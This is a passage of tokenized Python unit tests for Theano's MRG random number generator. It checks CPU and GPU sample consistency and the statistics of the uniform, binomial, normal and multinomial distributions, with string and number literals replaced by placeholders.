rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_GPU_parallel ( ) : <EOL> """<STR_LIT>""" <EOL> if not cuda_available : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> if config . mode == '<STR_LIT>' : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = config . mode <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_samples = [ ] <EOL> rstate = [ curr_rstate . copy ( ) ] <EOL> for j in range ( <NUM_LIT:1> , n_substreams ) : <EOL> rstate . append ( rng_mrg . ff_2p72 ( rstate [ - <NUM_LIT:1> ] ) ) <EOL> rstate = numpy . asarray ( rstate ) . flatten ( ) <EOL> tmp_float_buf = numpy . frombuffer ( rstate . data , dtype = '<STR_LIT>' ) <EOL> rstate = float32_shared_constructor ( tmp_float_buf ) <EOL> new_rstate , sample = rng_mrg . GPU_mrg_uniform . new ( rstate , ndim = None , <EOL> dtype = '<STR_LIT>' , <EOL> size = ( n_substreams , ) ) <EOL> rstate . default_update = new_rstate <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> cpu_sample = tensor . as_tensor_variable ( sample ) <EOL> f = theano . function ( [ ] , cpu_sample , mode = mode ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> stream_samples . append ( s ) <EOL> samples . append ( numpy . array ( stream_samples ) . T . flatten ( ) ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_GPU_nstreams_limit ( ) : <EOL> """<STR_LIT>""" <EOL> if not cuda_available : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> seed = <NUM_LIT> <EOL> R = MRG_RandomStreams ( seed = seed , use_cuda = True ) <EOL> def eval_uniform ( size , nstreams ) : <EOL> if theano . config . mode == "<STR_LIT>" : <EOL> mode = "<STR_LIT>" <EOL> else : <EOL> mode = copy . copy ( theano . compile . get_default_mode ( ) ) <EOL> mode . check_py_code = False <EOL> out = R . uniform ( size = size , nstreams = nstreams , dtype = '<STR_LIT>' ) <EOL> f = theano . function ( [ ] , out , mode = mode ) <EOL> return f ( ) <EOL> eval_uniform ( ( <NUM_LIT:10> , ) , <NUM_LIT:2> ** <NUM_LIT:20> ) <EOL> assert_raises ( ValueError , eval_uniform , ( <NUM_LIT:10> , ) , <NUM_LIT:2> ** <NUM_LIT:20> + <NUM_LIT:1> ) <EOL> def test_consistency_GPUA_serial ( ) : <EOL> """<STR_LIT>""" <EOL> from theano . sandbox . gpuarray . tests . test_basic_ops import mode_with_gpu as mode <EOL> from theano . sandbox . gpuarray . type import gpuarray_shared_constructor <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_rstate = curr_rstate . copy ( ) <EOL> for j in range ( n_substreams ) : <EOL> substream_rstate = numpy . array ( [ stream_rstate . copy ( ) ] , <EOL> dtype = '<STR_LIT>' ) <EOL> rstate = gpuarray_shared_constructor ( substream_rstate ) <EOL> new_rstate , sample = rng_mrg . GPUA_mrg_uniform . new ( rstate , <EOL> ndim = None , <EOL> dtype = '<STR_LIT>' , <EOL> size = ( <NUM_LIT:1> , ) ) <EOL> rstate . default_update = new_rstate <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> cpu_sample = tensor . as_tensor_variable ( sample ) <EOL> f = theano . function ( [ ] , cpu_sample , mode = mode ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> samples . append ( s ) <EOL> stream_rstate = rng_mrg . ff_2p72 ( stream_rstate ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_GPUA_parallel ( ) : <EOL> """<STR_LIT>""" <EOL> from theano . sandbox . gpuarray . tests . test_basic_ops import mode_with_gpu as mode <EOL> from theano . sandbox . gpuarray . type import gpuarray_shared_constructor <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_samples = [ ] <EOL> rstate = [ curr_rstate . copy ( ) ] <EOL> for j in range ( <NUM_LIT:1> , n_substreams ) : <EOL> rstate . append ( rng_mrg . ff_2p72 ( rstate [ - <NUM_LIT:1> ] ) ) <EOL> rstate = numpy . asarray ( rstate ) <EOL> rstate = gpuarray_shared_constructor ( rstate ) <EOL> new_rstate , sample = rng_mrg . GPUA_mrg_uniform . new ( rstate , ndim = None , <EOL> dtype = '<STR_LIT>' , <EOL> size = ( n_substreams , ) ) <EOL> rstate . default_update = new_rstate <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> cpu_sample = tensor . as_tensor_variable ( sample ) <EOL> f = theano . function ( [ ] , cpu_sample , mode = mode ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> stream_samples . append ( s ) <EOL> samples . append ( numpy . array ( stream_samples ) . T . flatten ( ) ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def basictest ( f , steps , sample_size , prefix = "<STR_LIT>" , allow_01 = False , inputs = None , <EOL> target_avg = <NUM_LIT:0.5> , target_std = None , mean_rtol = <NUM_LIT> , std_tol = <NUM_LIT> ) : <EOL> if inputs is None : <EOL> inputs = [ ] <EOL> dt = <NUM_LIT:0.0> <EOL> avg_var = <NUM_LIT:0.0> <EOL> for i in xrange ( steps ) : <EOL> t0 = time . time ( ) <EOL> ival = f ( * inputs ) <EOL> assert ival . shape == sample_size <EOL> dt += time . time ( ) - t0 <EOL> ival = numpy . asarray ( ival ) <EOL> if i == <NUM_LIT:0> : <EOL> mean = numpy . array ( ival , copy = True ) <EOL> avg_var = numpy . mean ( ( ival - target_avg ) ** <NUM_LIT:2> ) <EOL> min_ = ival . min ( ) <EOL> max_ = ival . max ( ) <EOL> else : <EOL> alpha = <NUM_LIT:1.0> / ( <NUM_LIT:1> + i ) <EOL> mean = alpha * ival + ( <NUM_LIT:1> - alpha ) * mean <EOL> avg_var = ( alpha * numpy . mean ( ( ival - target_avg ) ** <NUM_LIT:2> ) + <EOL> ( <NUM_LIT:1> - alpha ) * avg_var ) <EOL> min_ = min ( min_ , ival . min ( ) ) <EOL> max_ = max ( max_ , ival . max ( ) ) <EOL> if not allow_01 : <EOL> assert min_ > <NUM_LIT:0> <EOL> assert max_ < <NUM_LIT:1> <EOL> if hasattr ( target_avg , '<STR_LIT>' ) : <EOL> diff = numpy . mean ( abs ( mean - target_avg ) ) <EOL> assert numpy . all ( diff < mean_rtol * ( <NUM_LIT:1> + abs ( target_avg ) ) ) , ( <EOL> '<STR_LIT>' % ( mean , target_avg ) ) <EOL> else : <EOL> mean = numpy . mean ( mean ) <EOL> assert abs ( mean - target_avg ) < mean_rtol * ( <NUM_LIT:1> + abs ( target_avg ) ) , ( <EOL> '<STR_LIT>' % ( mean , target_avg ) ) <EOL> std = numpy . sqrt ( avg_var ) <EOL> if target_std is not None : <EOL> assert abs ( std - target_std ) < std_tol * ( <NUM_LIT:1> + abs ( target_std ) ) , ( <EOL> '<STR_LIT>' % ( std , target_std , std_tol ) ) <EOL> def test_uniform ( ) : <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT:10> , <NUM_LIT:100> ) <EOL> steps = <NUM_LIT:50> <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> steps = int ( <NUM_LIT> ) <EOL> x = tensor . matrix ( ) <EOL> for size , const_size , var_input , input in [ <EOL> ( sample_size , sample_size , [ ] , [ ] ) , <EOL> ( x . shape , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] ) , <EOL> ( ( x . shape [ <NUM_LIT:0> ] , sample_size [ <NUM_LIT:1> ] ) , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] ) , <EOL> ( ( ) , ( ) , [ ] , [ ] ) , <EOL> ] : <EOL> x = tensor . matrix ( ) <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> u = R . uniform ( size = size , <EOL> nstreams = rng_mrg . guess_n_streams ( size , warn = False ) ) <EOL> f = theano . function ( var_input , u , mode = mode ) <EOL> assert any ( [ isinstance ( node . op , theano . sandbox . rng_mrg . mrg_uniform ) <EOL> for node in f . maker . fgraph . toposort ( ) ] ) <EOL> cpu_out = f ( * input ) <EOL> if numpy . prod ( const_size ) < <NUM_LIT:10> : <EOL> steps_ = steps * <NUM_LIT:100> <EOL> else : <EOL> steps_ = steps <EOL> basictest ( f , steps_ , const_size , prefix = '<STR_LIT>' , inputs = input ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> u = R . uniform ( size = size , dtype = '<STR_LIT>' , <EOL> nstreams = rng_mrg . guess_n_streams ( size , warn = False ) ) <EOL> assert u . dtype == '<STR_LIT>' <EOL> f = theano . function ( var_input , theano . Out ( <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( u ) , <EOL> borrow = True ) , mode = mode_with_gpu ) <EOL> assert any ( [ isinstance ( node . op , <EOL> theano . sandbox . rng_mrg . GPU_mrg_uniform ) <EOL> for node in f . maker . fgraph . toposort ( ) ] ) <EOL> gpu_out = numpy . asarray ( f ( * input ) ) <EOL> basictest ( f , steps_ , const_size , prefix = '<STR_LIT>' , inputs = input ) <EOL> numpy . testing . assert_array_almost_equal ( cpu_out , gpu_out , <EOL> decimal = <NUM_LIT:6> ) <EOL> RR = theano . tensor . shared_randomstreams . RandomStreams ( <NUM_LIT> ) <EOL> uu = RR . uniform ( size = size ) <EOL> ff = theano . function ( var_input , uu , mode = mode ) <EOL> basictest ( ff , steps_ , const_size , prefix = '<STR_LIT>' , <EOL> allow_01 = True , inputs = input ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_binomial ( ) : <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT:10> , <NUM_LIT:50> ) <EOL> steps = <NUM_LIT:50> <EOL> rtol = <NUM_LIT> <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> steps = int ( <NUM_LIT> ) <EOL> rtol = <NUM_LIT> <EOL> x = tensor . matrix ( ) <EOL> for mean in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> ] : <EOL> for size , const_size , var_input , input in [ <EOL> ( sample_size , sample_size , [ ] , [ ] ) , <EOL> ( x . shape , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] ) , <EOL> ( ( x . shape [ <NUM_LIT:0> ] , sample_size [ <NUM_LIT:1> ] ) , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] ) , <EOL> ( ( ) , ( ) , [ ] , [ ] ) , <EOL> ] : <EOL> yield ( t_binomial , mean , size , const_size , var_input , input , <EOL> steps , rtol ) <EOL> def t_binomial ( mean , size , const_size , var_input , input , steps , rtol ) : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> u = R . binomial ( size = size , p = mean ) <EOL> f = theano . function ( var_input , u , mode = mode ) <EOL> out = f ( * input ) <EOL> if numpy . prod ( const_size ) < <NUM_LIT:10> : <EOL> steps_ = steps * <NUM_LIT:100> <EOL> else : <EOL> steps_ = steps <EOL> basictest ( f , steps_ , const_size , prefix = '<STR_LIT>' , <EOL> inputs = input , allow_01 = True , <EOL> target_avg = mean , mean_rtol = rtol ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> u = R . binomial ( size = size , p = mean , dtype = '<STR_LIT>' ) <EOL> assert u . dtype == '<STR_LIT>' <EOL> f = theano . function ( var_input , theano . Out ( <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( u ) , <EOL> borrow = True ) , mode = mode_with_gpu ) <EOL> gpu_out = numpy . asarray ( f ( * input ) ) <EOL> basictest ( f , steps_ , const_size , prefix = '<STR_LIT>' , <EOL> inputs = input , allow_01 = True , <EOL> target_avg = mean , mean_rtol = rtol ) <EOL> numpy . testing . assert_array_almost_equal ( out , gpu_out , <EOL> decimal = <NUM_LIT:6> ) <EOL> RR = theano . tensor . shared_randomstreams . RandomStreams ( <NUM_LIT> ) <EOL> uu = RR . binomial ( size = size , p = mean ) <EOL> ff = theano . function ( var_input , uu , mode = mode ) <EOL> basictest ( ff , steps_ , const_size , prefix = '<STR_LIT>' , allow_01 = True , <EOL> inputs = input , target_avg = mean , mean_rtol = rtol ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_normal0 ( ) : <EOL> steps = <NUM_LIT:50> <EOL> std = <NUM_LIT> <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:30> ) <EOL> default_rtol = <NUM_LIT> <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> default_rtol = <NUM_LIT> <EOL> sample_size_odd = ( sample_size [ <NUM_LIT:0> ] , sample_size [ <NUM_LIT:1> ] - <NUM_LIT:1> ) <EOL> x = tensor . matrix ( ) <EOL> for size , const_size , var_input , input , avg , rtol , std_tol in [ <EOL> ( sample_size , sample_size , [ ] , [ ] , - <NUM_LIT> , default_rtol , default_rtol ) , <EOL> ( x . shape , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] , <EOL> - <NUM_LIT> , default_rtol , default_rtol ) , <EOL> ( ( x . shape [ <NUM_LIT:0> ] , sample_size [ <NUM_LIT:1> ] ) , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] , <EOL> - <NUM_LIT> , default_rtol , default_rtol ) , <EOL> ( sample_size_odd , sample_size_odd , [ ] , [ ] , - <NUM_LIT> , <EOL> default_rtol , default_rtol ) , <EOL> ( x . shape , sample_size_odd , [ x ] , <EOL> [ numpy . zeros ( sample_size_odd , dtype = config . floatX ) ] , <EOL> - <NUM_LIT> , default_rtol , default_rtol ) , <EOL> ( sample_size , sample_size , [ ] , [ ] , <EOL> numpy . arange ( numpy . prod ( sample_size ) , <EOL> dtype = '<STR_LIT>' ) . reshape ( sample_size ) , <EOL> <NUM_LIT> * std / numpy . sqrt ( steps ) , default_rtol ) , <EOL> ( ( ) , ( ) , [ ] , [ ] , - <NUM_LIT> , default_rtol , <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:1> , ) , ( <NUM_LIT:1> , ) , [ ] , [ ] , - <NUM_LIT> , default_rtol , <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> , ) , ( <NUM_LIT:2> , ) , [ ] , [ ] , - <NUM_LIT> , default_rtol , <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:3> , ) , ( <NUM_LIT:3> , ) , [ ] , [ ] , - <NUM_LIT> , default_rtol , <NUM_LIT> ) , <EOL> ] : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> n = R . normal ( size = size , avg = avg , std = std , <EOL> nstreams = rng_mrg . guess_n_streams ( size , warn = False ) ) <EOL> f = theano . function ( var_input , n , mode = mode ) <EOL> out = f ( * input ) <EOL> if numpy . prod ( const_size ) < <NUM_LIT:10> : <EOL> steps_ = steps * <NUM_LIT:50> <EOL> else : <EOL> steps_ = steps <EOL> basictest ( f , steps_ , const_size , target_avg = avg , target_std = std , <EOL> prefix = '<STR_LIT>' , allow_01 = True , inputs = input , <EOL> mean_rtol = rtol , std_tol = std_tol ) <EOL> sys . stdout . flush ( ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> n = R . normal ( size = size , avg = avg , std = std , dtype = '<STR_LIT>' , <EOL> nstreams = rng_mrg . guess_n_streams ( size , warn = False ) ) <EOL> assert n . dtype == '<STR_LIT>' <EOL> f = theano . function ( var_input , theano . Out ( <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( n ) , <EOL> borrow = True ) , mode = mode_with_gpu ) <EOL> sys . stdout . flush ( ) <EOL> gpu_out = numpy . asarray ( f ( * input ) ) <EOL> sys . stdout . flush ( ) <EOL> basictest ( f , steps_ , const_size , target_avg = avg , target_std = std , <EOL> prefix = '<STR_LIT>' , allow_01 = True , inputs = input , <EOL> mean_rtol = rtol , std_tol = std_tol ) <EOL> assert numpy . allclose ( out , gpu_out , rtol = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> RR = theano . tensor . shared_randomstreams . RandomStreams ( <NUM_LIT> ) <EOL> nn = RR . normal ( size = size , avg = avg , std = std ) <EOL> ff = theano . function ( var_input , nn ) <EOL> basictest ( ff , steps_ , const_size , target_avg = avg , target_std = std , <EOL> prefix = '<STR_LIT>' , allow_01 = True , inputs = input , mean_rtol = rtol ) <EOL> def basic_multinomialtest ( f , steps , sample_size , target_pvals , n_samples , <EOL> prefix = "<STR_LIT>" , mean_rtol = <NUM_LIT> ) : <EOL> dt = <NUM_LIT:0.0> <EOL> avg_pvals = numpy . zeros ( target_pvals . shape , dtype = config . floatX ) <EOL> for i in xrange ( steps ) : <EOL> t0 = time . time ( ) <EOL> ival = f ( ) <EOL> assert ival . shape == sample_size <EOL> assert numpy . all ( numpy . sum ( ival , axis = <NUM_LIT:1> ) == n_samples ) <EOL> dt += time . time ( ) - t0 <EOL> avg_pvals += ival <EOL> avg_pvals /= ( steps * n_samples ) <EOL> assert numpy . mean ( abs ( avg_pvals - target_pvals ) ) < mean_rtol <EOL> print ( '<STR_LIT>' , numpy . asarray ( f ( ) [ : <NUM_LIT:10> ] ) ) <EOL> print ( prefix , '<STR_LIT>' , avg_pvals ) <EOL> print ( numpy . mean ( abs ( avg_pvals - target_pvals ) ) ) <EOL> print ( prefix , '<STR_LIT:time>' , dt ) <EOL> print ( prefix , '<STR_LIT>' , steps * numpy . prod ( target_pvals . shape ) ) <EOL> print ( prefix , '<STR_LIT>' , steps * numpy . prod ( target_pvals . shape ) / dt ) <EOL> def test_multinomial ( ) : <EOL> steps = <NUM_LIT:100> <EOL> mode_ = mode <EOL> if mode == '<STR_LIT>' : <EOL> mode_ = '<STR_LIT>' <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:5> ) <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:6> ) <EOL> mode_ = theano . compile . mode . get_mode ( mode_ ) <EOL> pvals = numpy . asarray ( numpy . random . uniform ( size = sample_size ) ) <EOL> pvals = numpy . apply_along_axis ( lambda row : row / numpy . sum ( row ) , <NUM_LIT:1> , pvals ) <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> m = R . multinomial ( pvals = pvals , dtype = config . floatX , nstreams = <NUM_LIT:30> * <NUM_LIT> ) <EOL> f = theano . function ( [ ] , m , mode = mode_ ) <EOL> out = f ( ) <EOL> basic_multinomialtest ( f , steps , sample_size , pvals , n_samples = <NUM_LIT:1> , <EOL> prefix = '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> pvals = numpy . asarray ( pvals , dtype = '<STR_LIT>' ) <EOL> n = R . multinomial ( pvals = pvals , dtype = '<STR_LIT>' , nstreams = <NUM_LIT:30> * <NUM_LIT> ) <EOL> assert n . dtype == '<STR_LIT>' <EOL> f = theano . function ( <EOL> [ ] , <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( n ) , <EOL> mode = mode_ . including ( '<STR_LIT>' ) ) <EOL> gpu_out = f ( ) <EOL> sys . stdout . flush ( ) <EOL> basic_multinomialtest ( f , steps , sample_size , pvals , n_samples = <NUM_LIT:1> , <EOL> prefix = '<STR_LIT>' ) <EOL> numpy . testing . assert_array_almost_equal ( out , gpu_out , decimal = <NUM_LIT:6> ) <EOL> def test_multinomial_n_samples ( ) : <EOL> mode_ = mode <EOL> if mode == '<STR_LIT>' : <EOL> mode_ = '<STR_LIT>' <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:5> ) <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:6> ) <EOL> mode_ = theano . compile . mode . get_mode ( mode_ ) <EOL> pvals = numpy . asarray ( numpy . random . uniform ( size = sample_size ) ) <EOL> pvals = numpy . apply_along_axis ( lambda row : row / numpy . sum ( row ) , <NUM_LIT:1> , pvals ) <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> for n_samples , steps in zip ( [ <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:100> , <NUM_LIT:1000> ] , [ <NUM_LIT:20> , <NUM_LIT:10> , <NUM_LIT:1> , <NUM_LIT:1> ] ) : <EOL> m = R . multinomial ( pvals = pvals , n = n_samples , <EOL> dtype = config . floatX , nstreams = <NUM_LIT:30> * <NUM_LIT> ) <EOL> f = theano . function ( [ ] , m , mode = mode_ ) <EOL> basic_multinomialtest ( f , steps , sample_size , pvals , <EOL> n_samples , prefix = '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> pvals = numpy . asarray ( pvals , dtype = '<STR_LIT>' ) <EOL> n = R . multinomial ( pvals = pvals , n = n_samples , <EOL> dtype = '<STR_LIT>' , nstreams = <NUM_LIT:30> * <NUM_LIT> ) <EOL> assert n . dtype == '<STR_LIT>' <EOL> f = theano . function ( <EOL> [ ] , <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( n ) , <EOL> mode = mode_ . including ( '<STR_LIT>' ) ) <EOL> sys . stdout . flush ( ) <EOL> basic_multinomialtest ( f , steps , sample_size , pvals , <EOL> n_samples , prefix = '<STR_LIT>' ) <EOL> class T_MRG ( unittest . TestCase ) : <EOL> def test_bad_size ( self ) : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> for size in [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:100> ) , <EOL> ( - <NUM_LIT:1> , <NUM_LIT:100> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> ] : <EOL> self . assertRaises ( ValueError , R . uniform , size ) <EOL> self . assertRaises ( ValueError , R . binomial , size ) <EOL> self . assertRaises ( ValueError , R . multinomial , size , <NUM_LIT:1> , [ ] ) <EOL> self . assertRaises ( ValueError , R . normal , size ) <EOL> def test_multiple_rng_aliasing ( ) : <EOL> """<STR_LIT>""" <EOL> rng1 = MRG_RandomStreams ( <NUM_LIT> ) <EOL> rng2 = MRG_RandomStreams ( <NUM_LIT> ) <EOL> assert rng1 . state_updates is not rng2 . state_updates <EOL> def test_random_state_transfer ( ) : <EOL> """<STR_LIT>""" <EOL> class Graph : <EOL> def __init__ ( self , seed = <NUM_LIT> ) : <EOL> self . rng = MRG_RandomStreams ( seed ) <EOL> self . y = self . rng . uniform ( size = ( <NUM_LIT:1> , ) ) <EOL> g1 = Graph ( seed = <NUM_LIT> ) <EOL> f1 = theano . function ( [ ] , g1 . y ) <EOL> g2 = Graph ( seed = <NUM_LIT> ) <EOL> f2 = theano . function ( [ ] , g2 . y ) <EOL> g2 . rng . rstate = g1 . rng . rstate <EOL> for ( su1 , su2 ) in zip ( g1 . rng . state_updates , g2 . rng . state_updates ) : <EOL> su2 [ <NUM_LIT:0> ] . set_value ( su1 [ <NUM_LIT:0> ] . get_value ( ) ) <EOL> numpy . testing . assert_array_almost_equal ( f1 ( ) , f2 ( ) , decimal = <NUM_LIT:6> ) <EOL> def test_gradient_scan ( ) : <EOL> theano_rng = MRG_RandomStreams ( <NUM_LIT:10> ) <EOL> w = theano . shared ( numpy . ones ( <NUM_LIT:1> , dtype = '<STR_LIT>' ) ) <EOL> def one_step ( x ) : <EOL> return x + theano_rng . uniform ( ( <NUM_LIT:1> , ) , dtype = '<STR_LIT>' ) * w <EOL> x = tensor . vector ( dtype = '<STR_LIT>' ) <EOL> values , updates = theano . scan ( one_step , outputs_info = x , n_steps = <NUM_LIT:10> ) <EOL> gw = theano . grad ( tensor . sum ( values [ - <NUM_LIT:1> ] ) , w ) <EOL> f = theano . function ( [ x ] , gw ) <EOL> f ( numpy . arange ( <NUM_LIT:1> , dtype = '<STR_LIT>' ) ) <EOL> def test_multMatVect ( ) : <EOL> A1 = tensor . lmatrix ( '<STR_LIT>' ) <EOL> s1 = tensor . ivector ( '<STR_LIT>' ) <EOL> m1 = tensor . iscalar ( '<STR_LIT>' ) <EOL> A2 = tensor . lmatrix ( '<STR_LIT>' ) <EOL> s2 = tensor . ivector ( '<STR_LIT>' ) <EOL> m2 = tensor . iscalar ( '<STR_LIT>' ) <EOL> g0 = rng_mrg . DotModulo ( ) ( A1 , s1 , m1 , A2 , s2 , m2 ) <EOL> f0 = theano . function ( [ A1 , s1 , m1 , A2 , s2 , m2 ] , g0 ) <EOL> i32max = numpy . iinfo ( numpy . int32 ) . max <EOL> A1 = numpy . random . randint ( <NUM_LIT:0> , i32max , ( <NUM_LIT:3> , <NUM_LIT:3> ) ) . astype ( '<STR_LIT>' ) <EOL> s1 = numpy . random . randint ( <NUM_LIT:0> , i32max , <NUM_LIT:3> ) . astype ( '<STR_LIT>' ) <EOL> m1 = numpy . asarray ( numpy . random . randint ( i32max ) , dtype = "<STR_LIT>" ) <EOL> A2 = numpy . random . randint ( <NUM_LIT:0> , i32max , ( <NUM_LIT:3> , <NUM_LIT:3> ) ) . astype ( '<STR_LIT>' ) <EOL> s2 = numpy . random . randint ( <NUM_LIT:0> , i32max , <NUM_LIT:3> ) . astype ( '<STR_LIT>' ) <EOL> m2 = numpy . asarray ( numpy . random . randint ( i32max ) , dtype = "<STR_LIT>" ) <EOL> f0 . input_storage [ <NUM_LIT:0> ] . storage [ <NUM_LIT:0> ] = A1 <EOL> f0 . input_storage [ <NUM_LIT:1> ] . storage [ <NUM_LIT:0> ] = s1 <EOL> f0 . input_storage [ <NUM_LIT:2> ] . storage [ <NUM_LIT:0> ] = m1 <EOL> f0 . input_storage [ <NUM_LIT:3> ] . storage [ <NUM_LIT:0> ] = A2 <EOL> f0 . input_storage [ <NUM_LIT:4> ] . storage [ <NUM_LIT:0> ] = s2 <EOL> f0 . input_storage [ <NUM_LIT:5> ] . storage [ <NUM_LIT:0> ] = m2 <EOL> r_a1 = rng_mrg . matVecModM ( A1 , s1 , m1 ) <EOL> r_a2 = rng_mrg . matVecModM ( A2 , s2 , m2 ) <EOL> f0 . fn ( ) <EOL> r_b = f0 . output_storage [ <NUM_LIT:0> ] . value <EOL> assert numpy . allclose ( r_a1 , r_b [ : <NUM_LIT:3> ] ) <EOL> assert numpy . allclose ( r_a2 , r_b [ <NUM_LIT:3> : ] ) <EOL> def test_seed_fn ( ) : <EOL> test_use_cuda = [ False ] <EOL> if cuda_available : <EOL> test_use_cuda . append ( True ) <EOL> idx = tensor . ivector ( ) <EOL> for use_cuda in test_use_cuda : <EOL> if config . mode == '<STR_LIT>' and use_cuda : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = config . mode <EOL> for new_seed , same in [ ( <NUM_LIT> , True ) , ( None , True ) , ( <NUM_LIT> , False ) ] : <EOL> random = MRG_RandomStreams ( <NUM_LIT> , use_cuda = use_cuda ) <EOL> fn1 = theano . function ( [ ] , random . uniform ( ( <NUM_LIT:2> , <NUM_LIT:2> ) , dtype = '<STR_LIT>' ) , <EOL> mode = mode ) <EOL> fn2 = theano . function ( [ ] , random . uniform ( ( <NUM_LIT:3> , <NUM_LIT:3> ) , nstreams = <NUM_LIT:2> , <EOL> dtype = '<STR_LIT>' ) , <EOL> mode = mode ) <EOL> fn3 = theano . function ( [ idx 